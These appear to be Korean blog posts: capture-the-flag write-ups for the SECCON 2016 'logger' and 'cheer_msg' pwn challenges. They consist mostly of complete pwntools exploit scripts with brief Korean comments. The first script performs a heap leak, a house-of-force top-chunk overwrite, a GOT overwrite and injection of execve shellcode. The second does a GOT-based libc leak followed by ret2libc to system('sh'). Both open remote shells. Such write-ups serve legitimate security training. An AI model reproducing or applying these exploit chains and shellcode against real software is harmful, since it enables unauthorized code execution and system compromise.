RDI, RSI, RDX, RCX, R8, R9, XMM0–7 순... |
https://ko.wikipedia.org/wiki/X86_%ED%98%B8%EC%B6%9C_%EA%B7%9C%EC%95%BD
| 리눅스에서 C언어 컴파일 (0) | 2017.05.05 |
|---|---|
| windows 10 bash ssh (0) | 2016.12.28 |
| geocoding excel (python) web (0) | 2016.02.04 |
| 라즈베리파이 부팅시 자동으로 dns설정 , 공유기 설정 (0) | 2016.01.21 |
| asm (0) | 2015.10.11 |
top chunk를 ffffffffffffffff로 덮고 다음 malloc할때 got부분을 할당받으면 된다
1 2 3 4 | 0x00400000 0x00402000 r-xp /root/logger 0x00601000 0x00602000 r-xp /root/logger 0x00602000 0x00603000 rwxp /root/logger 0x00603000 0x00624000 rwxp [heap] | cs |
heap의 권한이 rwxp이기때문에 힙에다 쉘코드를 넣으면 된다
2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 | from pwn import * elf = "/root/pwn/seccon/logger" #lib32 = "/root/pwn/seccon/libc-2.19.so-c4dc1270c1449536ab2efbbe7053231f1a776368" #lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so" # s = process(elf) # s1 = process(elf) s = remote('logger.pwn.seccon.jp',6565) s1 = remote('logger.pwn.seccon.jp',6565) e = ELF(elf) #l = ELF(lib32) DEBUG = 0 if DEBUG > 0: print "PID : %d" % util.proc.pidof(s)[0] if DEBUG == 2: context.log_level = 'debug' uid = str(time.time()) #uid = "debug" s.recvuntil("exit") s.sendline("1") s.sendline(uid) s.sendline(uid) s.recvuntil("exit") print "[*] id : %s" % uid s1.sendline("1") s1.sendline(uid) s1.sendline(uid) def read(ss): ss.sendline("1") return ss.recvuntil("exit").split("1. Read log")[0] def append(ss,size,data): ss.sendline("2") ss.recvuntil("128byte") ss.sendline(str(size)) ss.sendline(data) ss.recvuntil("exit") def leak(ss): ss.sendline("3") ss.recvuntil("filename: ") ss.recv(32) t = ss.recvuntil("=")[:-1] t += ("\x00" * (8-len(t))) ss.recvuntil("exit") return t #buf = malloc(file_size) leak heap_addr = u64( leak(s) ) print "[*] LEAK_HEAP : %x" % heap_addr #house of force #topchunk = ffffffffffffffff append(s1,32,"\xff"*32) read(s) offset = 0x602050 - 0x28 - heap_addr# - (32+16) print "[*] offset : %d" % offset #append(s,"%d"%offset,"A") append(s,"%d"%offset,"") #got Overwrite s.sendline("2") s.sendline("128") #http://shell-storm.org/shellcode/files/shellcode-806.php sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" sc = "\x90"*(0x40-len(sc)) + sc sc += p64(0x602080) s.sendline(sc) s.interactive() | cs |
| codegate 2017 (0) | 2017.02.11 |
|---|---|
| SECCON_2016 cheer (0) | 2016.12.11 |
| SECCON_2016 checker (0) | 2016.12.11 |
| SECCON_2016 jmper (0) | 2016.12.11 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 | from pwn import * elf = "/root/pwn/seccon/cheer_msg" lib32 = "/root/pwn/seccon/libc-2.19.so-c4dc1270c1449536ab2efbbe7053231f1a776368" #lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so" #s = process(elf) s = remote('cheermsg.pwn.seccon.jp',30527) e = ELF(elf) l = ELF(lib32) DEBUG = 1 if DEBUG == 2: context.log_level = 'debug' print s.recv() s.sendline("-142") print s.recv() ppppr = 0x80487AC main = 0x080484B0 offset = l.symbols['printf'] - l.symbols['system'] #sh = p32(0x08048627) + p32(0x804a090) + p32(0x804a090-1) + p32(100) #sh += p32(0x080485CA) + p32(ppppr + 1) + p32(0x804A020) + p32(20) #sh = p32(0x0804863C) + p32(0x0804A065) #sh = "A"*80+"PPPR12345678asdfzxcv" + "\n" sh = p32(e.symbols['printf']) + p32(main) + p32(e.got['printf']) raw_input() #s.send("A"*0x30+shellcode) s.sendline ( "A"*0x10 + sh) print s.recvuntil("Message : ") print s.recvuntil("\n") leak = u32(s.recv(4)) print "[*] LEAK : %x" % leak print s.recvuntil("Message Length >>") s.sendline("-142") sh = p32(leak - offset) + "AAAA" + p32(leak - (l.symbols['printf'] - list(l.search("sh\x00"))[0])) s.sendline( "A"*0x10 + sh) s.interactive() | cs |
| codegate 2017 (0) | 2017.02.11 |
|---|---|
| SECCON_2016 logger (0) | 2016.12.14 |
| SECCON_2016 checker (0) | 2016.12.11 |
| SECCON_2016 jmper (0) | 2016.12.11 |
